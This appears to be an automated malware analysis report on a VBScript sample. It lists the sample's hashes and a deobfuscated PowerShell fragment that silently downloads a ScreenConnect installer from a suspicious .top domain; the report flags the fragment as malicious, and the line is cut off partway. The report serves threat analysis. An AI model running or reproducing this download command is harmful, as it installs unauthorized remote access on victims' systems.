|
Hash | Hash Value |
|---|---|
| MD5 | 60883b803e1b75a5542f765335e22896
|
| Sha1 | 6e01fe68b0e7a1b4808d316ce49b5631d87ceacb
|
| Sha256 | 5a00ba097f8fe4c6b583f0aed574a2ef62bf6bcddab0224c006ed017a8f7af9e
|
| Sha384 | 8e4af2767a2a0db3f83109055cb684a5da60004d6b4473f3a9533f4d017ef787c994e93733ae5596a6fd407271b5bfab
|
| Sha512 | 813388c74f5f53425db651212d550689c290a6571af1511e766ccbf536a42be1ee845020e81d225e79b3620a5cba7ebf5c528d847ef27ffade12c343f99a6581
|
| SSDeep | 96:IazR41mGBg6lNBXmUjhivcVV/ic34M7p/+1aC/imi2w6/f42dD/Km/Jcy4pj:1zRWlIoV/iDYp/+p/df/goD/Km/w
|
| TLSH | A0C1410FBE0BA6306933433796977D1EEAA1645312120C25B9DE8187DF35658F7212FB
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://admin.diversifiedfireprotection.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest&c=k-cool&c=&c=&c=&c=&c=&c=&c= |
| Deobfuscated PowerShell | "$ProgressPreference = 'SilentlyContinue'; Try { Invoke-WebRequest -Uri 'https://admin.diversifiedfireprotection.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest&c=k-cool&c=&c=&c=&c=&c=&c=&c=' -OutFile '" |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://admin.diversifiedfireprotection.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest&c=k-cool&c=&c=&c=&c=&c=&c=&c= |
60883b803e1b75a5542f765335e22896 |
| Deobfuscated PowerShell | "$ProgressPreference = 'SilentlyContinue'; Try { Invoke-WebRequest -Uri 'https://admin.diversifiedfireprotection.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest&c=k-cool&c=&c=&c=&c=&c=&c=&c=' -OutFile '" Malicious |
60883b803e1b75a5542f765335e22896 > 60883b803e1b75a5542f765335e22896.deobfuscated.vbs > [Command #0] > [PowerShell Command] |